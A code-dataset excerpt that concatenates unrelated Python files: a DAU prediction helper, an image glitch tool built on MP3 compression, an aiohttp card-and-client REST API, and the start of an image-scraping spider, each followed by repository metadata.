def dnu_prediction(self, dau_goal=0, end_date=None):
"""
{
"dau_goal": 20000,
"target_date": "2020-11-24"
}
"""
# calc timedelta
start_date = datetime.datetime.now().date()
end_date = datetime.datetime.strptime(end_date, '%Y-%m-%d').date()
timedelta = (end_date - start_date).days
ideal_dnu = 0
# future dau goal
if timedelta >= 1:
# from yesterday to past, total factor-timedelta days
past_days = [x*y for x, y in zip(self.dnu, self.retention[timedelta:self.factor])]
ideal_dnu = (dau_goal - sum(past_days)) / (sum(self.retention[:timedelta]) + 1)
return 'You need to guarantee {} new users today and in the next {} day[s].'.format(round(ideal_dnu), timedelta)
# today dau goal
elif timedelta == 0:
past_days = [x*y for x, y in zip(self.dnu, self.retention[:self.factor])]
ideal_dnu = dau_goal - sum(past_days)
return 'You need to guarantee {} new users today.'.format(round(ideal_dnu))
else:
return 'Wrong Date.'
# 算法,
# 每运行一次就请求一次?
# 45days factor自动适应
if __name__ == '__main__':
predict = DailyIndexPrediction()
predict.test(1, 1)
# with open('predict_dau_b.json', 'r') as file_obj:
# data = json.load(file_obj)
# print(predict.dau_prediction(data)) | Silence-2020/mt-prediction | daily_index_prediction.py | daily_index_prediction.py | py | 9,807 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "json.load",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "aop.set_default_server",
"... |
74105530982 | #!/usr/bin/env python3
"""Gleitzsch core."""
import argparse
import sys
import os
import random
import string
import subprocess
from subprocess import DEVNULL
# from subprocess import PIPE
from array import array
import numpy as np
from skimage import io
from skimage import img_as_float
from skimage.util import img_as_ubyte
from skimage import transform as tf
from skimage import exposure
from skimage import util
from skimage import color
from skimage import filters
try:
from pydub import AudioSegment
except ImportError:
sys.stderr.write("Warning! Could not import pydub.\n")
sys.stderr.write("This library is not mandatory, however\n")
sys.stderr.write("filters on sound data would be not available\n")
AudioSegment = None
__author__ = "Bogdan Kirilenko, 2020"
__version__ = 4.0
# text constants
RB_SHIFT = "rb_shift"
GLITTER = "glitter"
GAMMA_CORRECTION = "gamma_correction"
ADD_TEXT = "add_text"
VERT_STREAKS = "vert_streaks"
ADD_NOISE = "add_noise"
SOUND_QUALITY = "sound_quality"
BITRATE = "bitrate"
INTENSIFY = "intensify"
GLITCH_SOUND = "glitch_sound"
ADD_RAINBOW = "add_rainbow"
SHIFT_SIZE = "shift_size"
STRETCHING = "stretching"
RANDOM = "random"
TEMP = "temp"
MIN_IM_SIZE = 64
class Gleitzsch:
"""Gleitzsch core class."""
def __init__(self, image_in, size=0, verbose=False):
"""Init gleitzsch class."""
# get image array
self.verbose = verbose
self.im_arr, _ = self.__read_im(image_in, size)
self.lame_bin = "lame"
self.__check_lame() # check that lame is available
self.supported_filters = [GLITTER, RB_SHIFT,
VERT_STREAKS, ADD_TEXT,
ADD_RAINBOW, STRETCHING]
# create temp directory
self.tmp_dir = os.path.join(os.path.dirname(__file__), TEMP)
os.mkdir(self.tmp_dir) if not os.path.isdir(self.tmp_dir) else None
self.temp_files = [] # collect temp files here (to delete later)
self.gamma = 0.4
self.text_position = RANDOM
self.v("Gleitzsch instance initiated successfully")
def __read_im(self, image_in, size):
"""Read image, return an array and shape."""
if isinstance(image_in, str) and os.path.isfile(image_in):
self.v(f"Reading file {image_in}")
matrix = img_as_float(io.imread(image_in))
elif isinstance(image_in, np.ndarray):
self.v("Reading np array")
matrix = img_as_float(image_in)
else:
matrix = None
self.__die(f"Cannot read:\n{image_in}")
# image might be either 3D or 2D; if 2D -> make it 3D
if len(matrix.shape) == 3:
pass # it's a 3D array already
elif len(matrix.shape) == 2:
# monochrome image; all procedures are 3D array-oriented
layer = np.reshape(matrix, (matrix.shape[0], matrix.shape[1], 1))
matrix = np.concatenate((layer, layer, layer), axis=2)
else: # something is wrong
self.__die("Image is corrupted")
# resize if this required
if size == 0:
# keep size as is (not recommended)
im = matrix.copy()
w, h, _ = im.shape
elif size < MIN_IM_SIZE: # what if size is negative?
im, w, h = None, 0, 0
self.__die("Image size (long side) must be > 64, got {size}")
else:
# resize the image
scale_k = max(matrix.shape[0], matrix.shape[1]) / size
h = int(matrix.shape[0] / scale_k)
w = int(matrix.shape[1] / scale_k)
im = tf.resize(image=matrix, output_shape=(h, w))
self.v(f"Successfully read image; shape: {w}x{h}")
return im, (w, h)
def __check_lame(self):
"""Check that lame is installed."""
check_cmd = f"{self.lame_bin} --version"
rc = subprocess.call(check_cmd, shell=True, stdout=DEVNULL)
if rc == 0:
self.v("Lame installation detected")
else:
self.__die("Lame installation not found, abort")
def apply_filters(self, filters_all):
"""Apply filters to image one-by-one.
filters_all -> a dict with filter_id: parameter.
"""
self.v(f"Calling apply filters function")
self.text_position = RANDOM
if not filters_all: # no filters: nothing to do
return
# keep available filters only + that have value
filters_ = {k: v for k, v in filters_all.items()
if k in self.supported_filters and v}
# better to keep them ordered
filters_order = sorted(filters_.keys(), key=lambda x: self.supported_filters.index(x))
for filt_id in filters_order:
value = filters_[filt_id]
self.v(f"Applying filter: {filt_id}, value={value}")
if filt_id == RB_SHIFT:
self.__apply_rb_shift(value)
elif filt_id == GLITTER:
self.__apply_glitter(value)
elif filt_id == VERT_STREAKS:
self.__add_vert_streaks()
elif filt_id == ADD_RAINBOW:
self.__add_rainbow()
elif filt_id == STRETCHING:
self.__apply_stretching()
def __apply_stretching(self):
"""Apply stretching filter."""
h = self.im_arr.shape[0]
w = self.im_arr.shape[1]
# split in 10 parts -> redefine this later
strips_num = 10
max_kt = 5
strip_w = w // strips_num
strips = []
scales = [x for x in max_kt * np.random.sample(strips_num)]
for j in range(strips_num):
strip = self.im_arr[:, j * strip_w: (j + 1) * strip_w, :]
new_shape = (h, int(strip_w * scales[j]))
strip_res = tf.resize(strip, new_shape)
strips.append(strip_res)
concatenation = np.concatenate(strips, axis=1)
self.im_arr = tf.resize(concatenation, (h, w))
def __make_bw_(self, thr):
"""Make BW image version."""
self.v("Producing BW version")
col_sum = np.sum(self.im_arr, axis=2) # sum over col channel
bw_im = np.zeros((col_sum.shape[0], col_sum.shape[1]))
# fill zero arr with 1 where color sum is > threshold: white
bw_im[col_sum > thr] = 1
# at prev step we created 2D arr, need 3D
bw_im = np.reshape(bw_im, (bw_im.shape[0], bw_im.shape[1], 1))
# io.imsave("test.jpg", bw_im)
return np.concatenate((bw_im, bw_im, bw_im), axis=2)
@staticmethod
def __rm_bright_zones(img):
"""Remove bright zones."""
col_sum = np.sum(img, axis=2)
over_thr = np.reshape((col_sum - 2), (img.shape[0], img.shape[1], 1))
over_thr = np.concatenate((over_thr, over_thr, over_thr), axis=2)
new_im = np.where(over_thr > 0, img - over_thr, img)
new_im[new_im < 0.0] = 0.0
new_im[new_im > 1.0] = 1.0
return new_im
def __rainbow_layer_(self, bw_im):
"""Create a rainbow layer."""
self.v("Making rainbow layer.")
rainbow_arr = self.__apply_rb_shift(80, non_self_pic=bw_im)
rainbow_arr = filters.gaussian(rainbow_arr,
sigma=30,
multichannel=True,
mode='reflect',
cval=0.6)
img_hsv = color.rgb2hsv(rainbow_arr)
img_hsv[..., 1] *= 3 # S
img_hsv[..., 2] *= 1.4 # V
img_hsv[img_hsv >= 1.0] = 1.0
rainbow_arr = color.hsv2rgb(img_hsv)
rainbow_arr = self.__rm_bright_zones(rainbow_arr)
# io.imsave("test.jpg", rainbow_arr)
return rainbow_arr
def __add_rainbow(self):
"""Add rainbow to the image."""
self.v("Adding a rainbow")
# detect bright parts
bw_version = self.__make_bw_(thr=2.1)
rainbow_pic = self.__rainbow_layer_(bw_version)
rainbow_pic /= 2
self.im_arr = rainbow_pic + self.im_arr
self.im_arr[self.im_arr > 1.0] = 1.0
def __add_vert_streaks(self):
"""Add vertical streaks."""
w, h, d = self.im_arr.shape
processed = []
streaks_borders_num = random.choice(range(8, 16, 2))
streaks_borders = [0] + list(sorted(np.random.choice(range(h),
streaks_borders_num,
replace=False))) + [h]
for num, border in enumerate(streaks_borders[1:]):
prev_border = streaks_borders[num]
pic_piece = self.im_arr[:, prev_border: border, :]
if num % 2 != 0: # don't touch this part
processed.append(pic_piece)
continue
piece_h, piece_w, _ = pic_piece.shape
piece_rearranged = []
shifts_raw = sorted([x if x > 0 else -x for x in
map(int, np.random.normal(5, 10, piece_w))])
shifts_add = np.random.choice(range(-5, 2), piece_w)
shifts_mod = [shifts_raw[x] + shifts_add[x] for x in range(piece_w)]
shifts_left = [shifts_mod[x] for x in range(0, piece_w, 2)]
shifts_right = sorted([shifts_mod[x] for x in range(1, piece_w, 2)],
reverse=True)
shifts = shifts_left + shifts_right
for col_num, col_ind in enumerate(range(piece_w)):
col = pic_piece[:, col_ind: col_ind + 1, :]
col = np.roll(col, axis=0, shift=shifts[col_num])
piece_rearranged.append(col)
piece_shifted = np.concatenate(piece_rearranged, axis=1)
processed.append(piece_shifted)
# merge shifted elements back
self.im_arr = np.concatenate(processed, axis=1)
self.im_arr = tf.resize(self.im_arr, (w, h))
def __apply_glitter(self, value):
"""Apply glitter."""
dots = [] # fill this list with dot coordinates
_dot_size = 3
w, h, _ = self.im_arr.shape
for _ in range(value):
# just randomly select some coordinates
dx = random.choice(range(_dot_size, w - _dot_size))
dy = random.choice(range(_dot_size, h - _dot_size))
dots.append((dx, dy))
for dot in dots:
self.im_arr[dot[0] - 1: dot[0], dot[1] - 3: dot[1] + 3, :] = 1
def shift_hue(self, value):
"""Shift image hue in HSV."""
img_hsv = color.rgb2hsv(self.im_arr)
img_hsv[..., 0] += value
img_hsv[..., 0] -= 1
self.im_arr = color.hsv2rgb(img_hsv)
def __apply_rb_shift(self, value, non_self_pic=None):
"""Draw chromatic aberrations."""
if non_self_pic is None:
_init_shape = self.im_arr.shape
proc_pic = self.im_arr
else: # apply this filter to something else:
self.v("Applying RGB shift to non-self.im_arr picture!")
_init_shape = non_self_pic.shape
proc_pic = non_self_pic
# extract different channels
red = proc_pic[:, :, 0]
green = proc_pic[:, :, 1]
blue = proc_pic[:, :, 2]
# resize different channels to create the effect
# define new sizes
red_x, red_y = _init_shape[0], _init_shape[1]
self.v(f"Red channel size: {red_x}x{red_y}")
green_x, green_y = _init_shape[0] - value, _init_shape[1] - value
self.v(f"Green channel size: {green_x}x{green_y}")
blue_x, blue_y = _init_shape[0] - 2 * value, _init_shape[1] - 2 * value
self.v(f"Blue channel size: {blue_x}x{blue_y}")
# check that sizes are OK
channel_borders = (red_x, red_y, green_x, green_y, blue_x, blue_y)
if any(x < 1 for x in channel_borders):
self.__die(f"{RB_SHIFT} got too bit value {value}; cannot apply")
# apply resize procedure
red = tf.resize(red, output_shape=(red_x, red_y))
green = tf.resize(green, output_shape=(green_x, green_y))
blue = tf.resize(blue, output_shape=(blue_x, blue_y))
w, h = blue.shape # temporary shape (minimal channel size)
self.v(f"Updated image size: {w}x{h}")
ktd2 = int(value / 2)
red_n = np.reshape(red[value: -value, value: -value],
(w, h, 1))
green_n = np.reshape(green[ktd2: -1 * ktd2, ktd2: -1 * ktd2],
(w, h, 1))
blue_n = np.reshape(blue[:, :], (w, h, 1))
# save changes to self.im_arr
if non_self_pic is None:
self.im_arr = np.concatenate((red_n, green_n, blue_n), axis=2)
# reshape it back
self.im_arr = tf.resize(self.im_arr, (_init_shape[0], _init_shape[1]))
self.v(f"Successfully applied {RB_SHIFT} filter")
return None
else:
# return image (not self.im_arr)
upd_img = np.concatenate((red_n, green_n, blue_n), axis=2)
upd_img = tf.resize(upd_img, (_init_shape[0], _init_shape[1]))
self.v("Applied RGB shift to non-self.im_arr image")
return upd_img
def __parse_mp3_attrs(self, attrs):
"""Parse mp3-related options."""
self.v("Defining mp3-compression parameters")
attrs_dict = {ADD_NOISE: False,
SOUND_QUALITY: 8,
BITRATE: 16,
INTENSIFY: False,
GLITCH_SOUND: False,
SHIFT_SIZE: int(self.im_arr.shape[1] / 2.35)
}
# correct shift size if bitrate is pretty high
if attrs_dict[BITRATE] >= 64:
attrs_dict[SHIFT_SIZE] = 0
avail_keys = set(attrs_dict.keys())
# re-define default params
for k, v in attrs.items():
if k not in avail_keys:
continue
if v is None:
continue
self.v(f"Set param {k} to {v}")
attrs_dict[k] = v
# sanity checks
if attrs_dict[SOUND_QUALITY] < 1 or attrs_dict[SOUND_QUALITY] > 10:
self.__die(f"Sound quality must be in [1..10]")
return attrs_dict
def __add_noise(self):
"""Add noise to image (intensifies the effect)."""
self.im_arr = util.random_noise(self.im_arr, mode="speckle")
def mp3_compression(self, attrs):
"""Compress and decompress the image using mp3 algorithm.
attrs -> a dictionary with additional parameters.
"""
# split image in channels
orig_image_ = self.im_arr.copy()
self.v("Applying mp3 compression")
mp3_attrs = self.__parse_mp3_attrs(attrs)
self.__add_noise() if mp3_attrs[ADD_NOISE] else None
# apply gamma correction upfront
self.im_arr = exposure.adjust_gamma(image=self.im_arr, gain=self.gamma)
w, h, _ = self.im_arr.shape
# after the mp3 compression the picture shifts, need to compensate that
# however, if bitrate >= 64 it doesn't actually happen
red = self.im_arr[:, :, 0]
green = self.im_arr[:, :, 1]
blue = self.im_arr[:, :, 2]
channels = (red, green, blue)
glitched_channels = []
# process them separately
for num, channel in enumerate(channels, 1):
# need 1D array now
orig_size = w * h
channel_flat = np.reshape(channel, newshape=(orig_size, ))
int_form_nd = np.around(channel_flat * 255, decimals=0)
int_form_nd[int_form_nd > 255] = 255
int_form_nd[int_form_nd < 0] = 0
# convert to bytes
int_form = list(map(int, int_form_nd))
bytes_str = bytes(int_form)
# define temp file paths
raw_chan_ = os.path.join(self.tmp_dir, f"{self.__id_gen()}.blob")
mp3_compr_ = os.path.join(self.tmp_dir, f"{self.__id_gen()}.mp3")
mp3_decompr_ = os.path.join(self.tmp_dir, f"{self.__id_gen()}.mp3")
# save paths (to remove the files later)
self.temp_files.extend([raw_chan_, mp3_compr_, mp3_decompr_])
# save bytes so a pseudo-wav file
self.v(f"Bytes size before compression: {orig_size}")
with open(raw_chan_, "wb") as f:
f.write(bytes_str)
# define compress-decompress commands
mp3_compr_cmd = f'{self.lame_bin} -r --unsigned -s 16 -q {mp3_attrs[SOUND_QUALITY]} ' \
f'--resample 16 --bitwidth 8 -b {mp3_attrs[BITRATE]} ' \
f'-m m {raw_chan_} "{mp3_compr_}"'
mp3_decompr_cmd = f'{self.lame_bin} --decode -x -t "{mp3_compr_}" {mp3_decompr_}'
# call compress-decompress commands
self.__call_proc(mp3_compr_cmd)
# if required: change mp3 stream itself
self.__glitch_sound(mp3_compr_, num, mp3_attrs) if mp3_attrs[GLITCH_SOUND] else None
self.__call_proc(mp3_decompr_cmd)
# read decompressed file | get raw sequence
with open(mp3_decompr_, "rb") as f:
mp3_bytes = f.read()
upd_size = len(mp3_bytes)
self.v(f"Bytes size after compression: {upd_size}")
# usually array size after compression is bigger
proportion = upd_size // orig_size
# split in chunks of proportion size, take the 1st element from each
bytes_num = len(bytes_str) * proportion
decompressed = mp3_bytes[:bytes_num]
glitched_channel = np.array([pair[0] / 255 for pair
in self.parts(decompressed, proportion)])
glitched_channel = np.reshape(glitched_channel, newshape=(w, h, 1))
glitched_channels.append(glitched_channel)
self.v("Concatenation of the mp3d image + rolling + adjust contrast")
self.im_arr = np.concatenate(glitched_channels, axis=2)
self.im_arr = np.roll(a=self.im_arr, axis=1, shift=mp3_attrs[SHIFT_SIZE])
perc_left, perc_right = np.percentile(self.im_arr, (5, 95))
self.im_arr = exposure.rescale_intensity(self.im_arr, in_range=(perc_left, perc_right))
self.__remove_temp_files() # don't need them anymore
self.__intensify(orig_image_) if mp3_attrs[INTENSIFY] else None
def __glitch_sound(self, mp3_path, ch_num, opts):
"""Change mp3 file directly."""
self.v(f"Changing sound stream in {mp3_path} directly")
if AudioSegment is None:
self.__die("__glitch_sound requires Audiosegment (not imported)")
x, y, _ = self.im_arr.shape
# read sound file, get array of bytes (not a list!)
sound = AudioSegment.from_mp3(mp3_path)
last_ind = x * y # sound array is a bit longer than image size
entire_sound_array = np.array(sound.get_array_of_samples())
# some processing here
# final step: convert np array back to array
new_array = array("h", entire_sound_array)
new_sound = sound._spawn(new_array)
new_sound.export(mp3_path, format='mp3')
def __intensify(self, orig_image):
"""Intensify mp3 glitch using differences with original image."""
self.v("Increasing mp3 glitch intensity")
diff = self.im_arr - orig_image
diff[diff < 0] = 0
diff_hsv = color.rgb2hsv(diff)
diff_hsv[..., 1] *= 5
diff_hsv[..., 2] *= 2.5
diff_hsv[diff_hsv >= 1.0] = 1.0
diff = color.hsv2rgb(diff_hsv)
self.im_arr += diff
self.im_arr[self.im_arr > 1.0] = 1.0
def __call_proc(self, command):
"""Call command using subprocess."""
self.v(f"Calling command: {command}")
rc = subprocess.call(command, shell=True, stderr=DEVNULL)
if rc != 0:
self.__die(f"Error! Command {command} died!")
def __remove_temp_files(self):
"""Remove temp files listed in the self.temp_files."""
self.v(f"Removing temp files: {self.temp_files}")
for tmp_file in self.temp_files:
os.remove(tmp_file) if os.path.isfile(tmp_file) else None
def save(self, path_):
"""Save the resulting image."""
self.v(f"Saving image to: {path_}")
io.imsave(fname=path_, arr=img_as_ubyte(self.im_arr))
def v(self, msg):
"""Show verbose message."""
sys.stderr.write(f"{msg}\n") if self.verbose else None
@staticmethod
def __die(message, rc=1):
"""Write message and quit."""
sys.stderr.write("Error!\n")
sys.stderr.write(f"{message}\n")
sys.exit(rc)
@staticmethod
def __id_gen(size=12, chars=string.ascii_uppercase + string.digits):
"""Return random string for temp files."""
return "".join(random.choice(chars) for _ in range(size))
@staticmethod
def parts(lst, n):
"""Split an iterable into a list of lists of len n."""
return [lst[x: x + n] for x in iter(range(0, len(lst), n))]
def parse_args():
"""Parse cmd args."""
app = argparse.ArgumentParser()
app.add_argument("input", help="Input image")
app.add_argument("output", help="Output image")
app.add_argument("--size", default=1000, type=int, help="Image size (long side)")
app.add_argument("--verbose", "--v1", action="store_true", dest="verbose",
help="Verbosity mode on.")
# filters
app.add_argument(f"--{RB_SHIFT}", "-r", default=0, type=int,
help="RGB aberrations, the bigger value -> the higher intensity")
app.add_argument(f"--{GLITTER}", "-g", default=0, type=int,
help="Add glitter, The bigger value -> the bigger sparks")
app.add_argument(f"--{VERT_STREAKS}", "-v", action="store_true", dest=VERT_STREAKS,
help="Add vertical streaks")
app.add_argument(f"--{ADD_TEXT}", "-t", default=None,
help="Add text (position is random)")
app.add_argument("--text_position", "--tp", type=str,
help="Pre-define text coordinates (left corner) "
"two comma-separated values like 100,50")
app.add_argument(f"--{ADD_RAINBOW}", "-a", dest=ADD_RAINBOW, action="store_true",
help="Add a rainbow!")
# mp3-compression params
app.add_argument(f"--compression_cycles", "--cc", default=1, type=int,
help="Number of mp3 compression-decompression cycles, default 1")
app.add_argument("--save_each_cycle", "--sec", default=None,
help="Save an image of each compression cycle, specify "
"a directory if this is a case")
app.add_argument(f"--{STRETCHING}", "--st", action="store_true", dest=STRETCHING,
help="Apply stretching filter")
app.add_argument(f"--{ADD_NOISE}", "-n", action="store_true", dest=ADD_NOISE,
help="Add random noise to increase glitch effect")
app.add_argument(f"--{SOUND_QUALITY}", "-q", type=int, default=8,
help="Gleitzsch sound quality")
app.add_argument(f"--{BITRATE}", "-b", type=int, default=16,
help="MP3 bitrate")
app.add_argument(f"--{INTENSIFY}", "-i", action="store_true", dest=INTENSIFY,
help="Get diff between mp3 glitched/not glitched image and "
"intensify glitched channel")
app.add_argument(f"--{GLITCH_SOUND}", "-s", action="store_true", dest=GLITCH_SOUND,
help="Modify intermediate mp3 files")
app.add_argument(f"--{SHIFT_SIZE}", "--sz", default=None, type=int,
help="Mp3 compression produces a horizontally shifted image "
"This parameter controls shift size, overriding "
"automatically assigned values")
if len(sys.argv) < 3:
app.print_help()
sys.exit(0)
args_ = app.parse_args()
return args_
if __name__ == "__main__":
args = parse_args()
gleitzsch = Gleitzsch(args.input, args.size, args.verbose)
gleitzsch.apply_filters(vars(args)) # as a dict: filter id -> value
if args.compression_cycles > 1 and args.save_each_cycle:
os.mkdir(args.save_each_cycle) if not os.path.isdir(args.save_each_cycle) else None
for i in range(args.compression_cycles):
if args.compression_cycles > 1:
sys.stderr.write(f"Compression cycle num {i + 1}/{args.compression_cycles}\n")
gleitzsch.mp3_compression(vars(args))
if args.save_each_cycle:
filename = f"{str(i).zfill(4)}.jpg"
path = os.path.join(args.save_each_cycle, filename)
gleitzsch.save(path)
gleitzsch.save(args.output)
| kirilenkobm/gleitzsch_v4 | gleitzsch.py | gleitzsch.py | py | 24,870 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.stderr.write",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sys.stderr",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "sys.stderr.write",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "sys.stderr",
"l... |
38054510986 | import accept
import logging
from aiohttp import web, web_exceptions
from aiohttp_swagger import setup_swagger
from model import ClientModel, ItemNotFoundException
from protocol import *
from prometheus_client import REGISTRY, exposition
from urllib.parse import parse_qs
from voluptuous import MultipleInvalid
class Api:
DEFAULT_CONTENT_TYPE = "application/json"
logger = logging.getLogger(__name__)
registry = REGISTRY
__encoders = {
"application/xml": XMLEncoder(),
"application/json": JsonEncoder()
}
def __init__(self, host, port, transactor):
self.__app = web.Application()
self.__host = host
self.__port = port
self.__app.add_routes([
web.get('/', self.health),
web.get('/metrics', self.metrics),
web.get('/v1/cards', self.card_list),
web.post('/v1/cards', self.add_card),
web.get('/v1/clients', self.client_list),
web.post('/v1/clients', self.add_client),
web.get(r'/v1/clients/{id:\d+}/balance', self.client_balance),
web.put(r'/v1/cards/{id:\d+}', self.change_card)
])
self.__client_model = ClientModel(transactor)
def __paginate(self, request):
qs = parse_qs(request.query_string)
offsets = qs.get('offset', [0])
if len(offsets) > 1:
raise web_exceptions.HTTPBadRequest(text='Invalid offset value')
limits = qs.get('limit', [20])
if len(limits) > 1:
raise web_exceptions.HTTPBadRequest(text='Invalid limit value')
return int(offsets[0]), int(limits[0])
def __choose_encoder(self, request):
for accept_header in accept.parse(request.headers.get('Accept')):
if accept_header.media_type == '*/*':
return self.__encoders.get(self.DEFAULT_CONTENT_TYPE)
encoder = self.__encoders.get(accept_header.media_type)
if encoder is not None:
return encoder
raise web_exceptions.HTTPNotAcceptable()
async def __decode_post(self, request):
if request.content_type == "application/json":
return await request.json()
if request.content_type == "application/xml":
return {"data": "xml"}
raise web_exceptions.HTTPBadRequest(
text="Unknown Content-Type header. Only application/json, application/xml are allowed."
)
async def start(self):
setup_swagger(self.__app, swagger_url='/v1/docs')
runner = web.AppRunner(self.__app)
await runner.setup()
service = web.TCPSite(runner, self.__host, self.__port)
await service.start()
self.logger.info('Service is started at %s:%s', self.__host, self.__port)
async def health(self, _):
"""
---
description: Запрос для проверки успешного запуска сервиса.
tags:
- Health check
produces:
- text/plain
responses:
"200":
description: успех. Возвращает информацию о сервисе
"""
return web.Response(text="Ok")
async def metrics(self, request):
"""
---
description: Запрос для получения метрик сервиса
tags:
- Metrics
produces:
- text/plain
responses:
"200":
description: успех. Возвращает метрики
"""
encoder, content_type = exposition.choose_encoder(request.headers.get('Accept'))
scrape = encoder(self.registry)
return web.Response(headers=dict([('Content-Type', content_type)]), body=scrape)
async def card_list(self, request):
"""
---
description: Запрос для получения списка карт клиентов
tags:
- Cards
produces:
- application/json
- application/xml
parameters:
- name: offset
in: query
description: Pagination offset
required: false
type: integer
- name: limit
in: query
description: Pagination limit
required: false
type: integer
responses:
"200":
description: успех. Возвращает список карт клиентов
"406":
description: ошибка клиента. Указан неверный Accept
"""
encoder = self.__choose_encoder(request)
offset, limit = self.__paginate(request)
cards, count = await self.__client_model.all_cards(offset, limit)
return web.Response(content_type=encoder.content_type, body=encoder.encode(cards), headers={"X-Total": str(count)})
async def add_card(self, request):
"""
---
description: Запрос для добавления новой карты клиента
tags:
- Cards
produces:
- application/json
- application/xml
parameters:
- name: card
in: body
description: данные новой карты
required: true
schema:
type: object
properties:
owner_id:
type: integer
description: идентификатор владельца карты
required: true
payment_system:
type: string
description: платежная система
required: true
currency:
type: string
description: валюта карты
required: true
balance:
type: numeric
description: баланс карты
required: true
responses:
"200":
description: успех. Возвращает данные новой карты клиента
"404":
description: ошибка. Клиент не найден
"406":
description: ошибка клиента. Указан неверный Accept
"""
encoder = self.__choose_encoder(request)
data = await self.__decode_post(request)
try:
card = await self.__client_model.add_card(data)
return web.HTTPCreated(content_type=encoder.content_type, body=encoder.encode(card))
except MultipleInvalid as e:
raise web_exceptions.HTTPBadRequest(text=str(e))
except ItemNotFoundException as e:
raise web_exceptions.HTTPNotFound(text=str(e))
async def client_list(self, request):
"""
---
description: Запрос для получения списка клиентов
tags:
- Clients
produces:
- application/json
- application/xml
parameters:
- name: offset
in: query
description: Pagination offset
required: false
type: integer
- name: limit
in: query
description: Pagination limit
required: false
type: integer
responses:
"200":
description: успех. Возвращает список клиентов
"406":
description: ошибка клиента. Указан неверный Accept
"""
encoder = self.__choose_encoder(request)
offset, limit = self.__paginate(request)
clients, count = await self.__client_model.all_clients(offset, limit)
return web.Response(content_type=encoder.content_type, body=encoder.encode(clients), headers={"X-Total": str(count)})
async def add_client(self, request):
"""
---
description: Запрос для добавления нового клиента
tags:
- Clients
produces:
- application/json
- application/xml
parameters:
- name: card
in: body
description: данные нового клиента
required: true
schema:
type: object
properties:
name:
type: string
description: имя клиента
responses:
"200":
description: успех. Возвращает данные нового клиента
"406":
description: ошибка клиента. Указан неверный Accept
"""
encoder = self.__choose_encoder(request)
data = await self.__decode_post(request)
try:
client = await self.__client_model.add_client(data)
return web.HTTPCreated(content_type=encoder.content_type, body=encoder.encode(client))
except MultipleInvalid as e:
raise web_exceptions.HTTPBadRequest(text=str(e))
async def client_balance(self, request):
"""
---
description: Запрос для получения баланса клиента
tags:
- Clients
produces:
- application/json
- application/xml
parameters:
- name: id
in: path
description: идентификатор клиента
required: false
type: integer
responses:
"200":
description: успех. Возвращает данные нового клиента
"404":
description: ошибка. Клиент не найден
"406":
description: ошибка клиента. Указан неверный Accept
"""
client_id = int(request.match_info.get('id'))
encoder = self.__choose_encoder(request)
client = await self.__client_model.client_balance(client_id)
return web.Response(content_type=encoder.content_type, body=encoder.encode(client))
async def change_card(self, request):
"""
---
description: Запрос для изменение данных по карте
tags:
- Cards
produces:
- application/json
- application/xml
parameters:
- name: id
in: path
description: идентификатор карты
required: true
type: integer
- name: card
in: body
description: данные карты
required: true
schema:
type: object
properties:
owner_id:
type: integer
description: идентификатор владельца карты
payment_system:
type: string
description: платежная система
currency:
type: string
description: валюта карты
balance:
type: float
description: баланс карты
responses:
"200":
description: успех. Возвращает измененные данные карты
"400":
description: ошибка клиента. Указаны неверные данные карты
"404":
description: ошибка. Карта не найдена
"406":
description: ошибка клиента. Указан неверный Accept
"""
card_id = int(request.match_info.get('id'))
encoder = self.__choose_encoder(request)
data = await self.__decode_post(request)
try:
card = await self.__client_model.change_card(card_id, data)
return web.Response(content_type=encoder.content_type, body=encoder.encode(card))
except MultipleInvalid as e:
raise web_exceptions.HTTPBadRequest(text=str(e))
| weierstrass54/sb_rest | api.py | api.py | py | 12,166 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "prometheus_client.REGISTRY",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "aiohttp.web.Application",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "... |
625331659 | import os
import time
from io import BytesIO
import aiohttp
import asyncio
import requests
from PIL import Image
from lxml import etree
# import pandas as pd
class Spider(object):
"""
下载路径在实例化时候指定,比如:r'd:\test\\',这个目录如果不存在,会出错。
如果想给文件名加前缀,只要在目录下加前缀就行,比如:r'd:\test\abc',那么生成的文件前面都有abc
默认路径为当前文件下的downpic目录,此目录如果不存在会自动生成
"""
def __init__(self, down_path=''):
self.headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36'
}
self.num = 0
if down_path == "":
if 'downpic' not in os.listdir('.'): # 当前目录下的downpic目录
os.mkdir('downpic')
self.path = os.path.join(os.path.abspath('.'), 'downpic')
os.chdir(self.path) # 进入文件下载路径
self.down_path = down_path
self.url = 'https://apps.wow-trend.com/api/trend/picture/get-list'
self.params = {'nav_id': '35', 'gender_id': '72105', 'size': '60', 'page': '1', 'attrs': '[]'}
def get_img_links(self, page, get_total_page=False): # 获取图片连接
self.params['page'] = str(page)
# try:
print('正在爬取页数:', page)
r = requests.get(url=self.url, headers=self.headers, params=self.params)
result = r.json()
if get_total_page: return result['data']['totalPage'] # 获取总页数
urls_info = result['data']['list']
print('本页{}张图片'.format(len(urls_info)))
return urls_info
# except Exception as e:
# print(e)
async def get_sub_img_links(self, url): # 获取大图图片连接
# print(url)
async with aiohttp.ClientSession(headers=self.headers) as session:
r = await session.get(url)
rtext = await r.text()
el = etree.HTML(rtext)
# 获取作者信息
author_path = '//*[@id="__next"]/div/main/div[1]/div/div[3]/div[1]/div[1]/span[2]/a'
author = el.xpath(author_path)[0]
author_name = author.xpath('./text()')[0]
author_code = author.xpath('./@href')[0].split('/')[-1]
author_info = f'{author_name}_{author_code}'
# print(author_info)
# 获取作者信息结束
pic_xpath = '//*[@id="__next"]/div/main/div[1]/div/div[2]/div/div[1]/figure/img/@data-src'
await self.__download_img(el.xpath(pic_xpath)[0], crop=True, prefix=author_info)
def _write_img(self, file_name, content):
# if not crop:
file_name_resize = os.path.join(self.down_path, '略缩图', file_name)
self._resize_image(BytesIO(content), outfile=file_name_resize)
# else:
